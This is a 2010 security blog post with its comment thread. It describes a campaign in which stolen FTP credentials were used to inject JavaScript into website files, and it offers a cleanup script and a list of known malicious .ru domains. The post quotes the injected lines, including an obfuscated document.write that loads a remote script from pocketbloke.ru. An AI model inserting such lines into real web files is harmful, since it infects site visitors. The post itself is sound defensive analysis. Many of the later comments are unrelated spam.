Home > Malware, PHP, Randomness, Security > Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 Leave a comment Go to comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

Categories: Malware, PHP, Randomness, Security Tags:
  1. Edwin
    September 7th, 2010 at 18:56 | #1

    Thanks for the script, really appriciate your work here.
    I have this hack on 6 hosting accounts now and each account has 100k+ files as each account has about 100 domains with wordpress installed on it 🙁

  2. September 8th, 2010 at 12:38 | #2

    My site vidyaweb.com was also taken down by infection from pocketbloke.ru. I made do by using Filezilla without saving passwords in Quickconnect Bar for a week. Today, I scanned my PC and discovered two suspected hidden files kkypqe.sys and frtisc.sys in the folder c:\windows\system32\drivers suspected to be rootkits by Avira anti virus with hidden registery keys with the same name. However, Avira was not able to delete it and had to resort to booting through Linux and deleting the suspected files.

    Thereafter, I was also able to delete the registry keys too, but only after changing permissions on them. Besides these, no other infection was detected by Avira.

    Can I safely assume now that I am free of malware and start trusting Filezilla again.

  3. Default User
    September 12th, 2010 at 10:44 | #3

    vikram solia :
    Can I safely assume now that I am free of malware and start trusting Filezilla again.

    No. If you get infected again by visiting an infected site or getting an infected email, it’ll start all over again. Use FZ by all means, but don’t store passwords in it.

  4. Clarkson
    September 15th, 2010 at 17:48 | #4

    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

  5. Default User
    September 16th, 2010 at 10:42 | #5

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

  6. Default User
    September 16th, 2010 at 10:43 | #6

    Default User :

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

  7. September 16th, 2010 at 17:24 | #7

    Default User :

    Default User :

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

    Use Keepass, and just like with FZ dont save P/W in your browsers. Instal qfxsoftware.com’s Keyscrambler to evade those sniffers 🙂

  8. Carlitos
    November 28th, 2010 at 08:00 | #8

    Hi…
    I’m a regular pc user like most and only use the web to access my facebook,news etc. I don’t use any ftp clients like fz. But the other day i checked my log after my scheduled virus scan,and there it was: pocketbloke.ru/facebook.js
    To me this indicates that somehow,somewhere when using Facebook this happened. I cleaned up the mess as best i could by using Malwarebytes Anti Malware and Nod32 (quarantined).
    So my questions are: Are Facebook users in danger now and should i report this to Fb hq?,and should i to be sure maby reinstall my os and change my passwords to Facebook,Windows live messenger etc.?

  9. December 19th, 2010 at 20:38 | #9

    “All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.”
    You can more about this?

  10. June 8th, 2011 at 15:29 | #10

    That is another website, pantscow.ru

  11. July 25th, 2011 at 05:28 | #11

    Hey Can we somehow edit the code of your script to add some other text
    which needs to be removed.

    I mean if infection is from included infections in your code.

  12. February 17th, 2013 at 11:17 | #12

    Wonderful blog! I found it while surfing around on Yahoo News.

    Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Thank you

  13. July 14th, 2013 at 05:31 | #13

    ” Take the time to include this exercise in your arsenal of in home conditioning workouts. This alone at a high enough intensity would be a lot more effective for burning fat than the 30 – 60 minutes on a treadmill. This provides the muscles an opportunity to do some work, expend energy, and keep the muscles in good tone and fitness.

  14. August 3rd, 2013 at 02:40 | #14

    Why visitors still use to read news papers when in this technological
    globe the whole thing is accessible on web?

  15. August 6th, 2013 at 04:55 | #15

    Does your site have a contact page? I’m having trouble locating it but, I’d like to send you an email.
    I’ve got some suggestions for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it improve over time.

  16. August 23rd, 2013 at 06:33 | #16

    Hello this is kind of of off topic but I was wondering if blogs use WYSIWYG
    editors or if you have to manually code with HTML. I’m starting a blog soon but have no coding know-how so I wanted to get advice from someone with experience. Any help would be greatly appreciated!

  17. October 21st, 2013 at 15:11 | #17

    Hi, just wanted to say, I loved this article. It was funny.

    Keep on posting!

  18. October 26th, 2013 at 01:27 | #18

    For the writing techniques I use, see Mary Duffy’s e-book: Sentence Openers.
    You will discover better results and very quickly will have a very deeper comprehension of what are the benefits to
    get a fantastic article promotion campaign.

    These newer solar power panels for homes can utilize this
    weaker sunlight, through converting it may generate more power in a very given day to
    your home.

  19. November 26th, 2013 at 23:57 | #19

    What’s up, its good post on the topic of media print, we
    all be aware of media is a fantastic source of information.

  20. November 27th, 2013 at 03:23 | #20

    Fantastic beat ! I would like to apprentice even as you amend your website, how could i subscribe for a blog website?
    The account helped me a applicable deal. I were a little bit familiar of this your broadcast provided brilliant clear idea

  21. December 5th, 2013 at 08:28 | #21

    Usually I don’t read article on blogs, but I would like
    to say that this write-up very pressured me to check
    out and do it! Your writing taste has been surprised me.

    Thank you, very nice post.

  22. October 1st, 2014 at 17:31 | #22

    Very energetic article, I loved that bit. Will there be a
    part 2?

  23. October 11th, 2014 at 23:13 | #23

    The backend part of your company supports these
    profit centers. Then consider yourself one
    of the few, true internet marketers. For more information visit: security gives you the protection from all kinds of worms,
    viruses and other problems.

  24. JK Cinema
    January 25th, 2015 at 20:45 | #24

    I must of downloaded something I shouldn’t have & now my Homepage is being hijacked by http://hi.ru/?10

  25. October 26th, 2015 at 17:10 | #25

    Maximizing the open concept for your custom home design can also
    be done by separating each space with a change in floor treatments.

    Fantasy Signs ‘ these can be added to a
    kids room, or as regular wall art. Many of the homes with Greek style utilize the front-gable design, which
    reflects most of the traditional Greek homes.

  26. December 6th, 2015 at 03:53 | #26

    Thank you for the auspicious writeup. It in reality used to be a entertainment account it.
    Look complex to more introduced agreeable from you!
    By the way, how could we keep up a correspondence?

Comment pages
1 2 3 105
  1. August 8th, 2014 at 11:38 | #1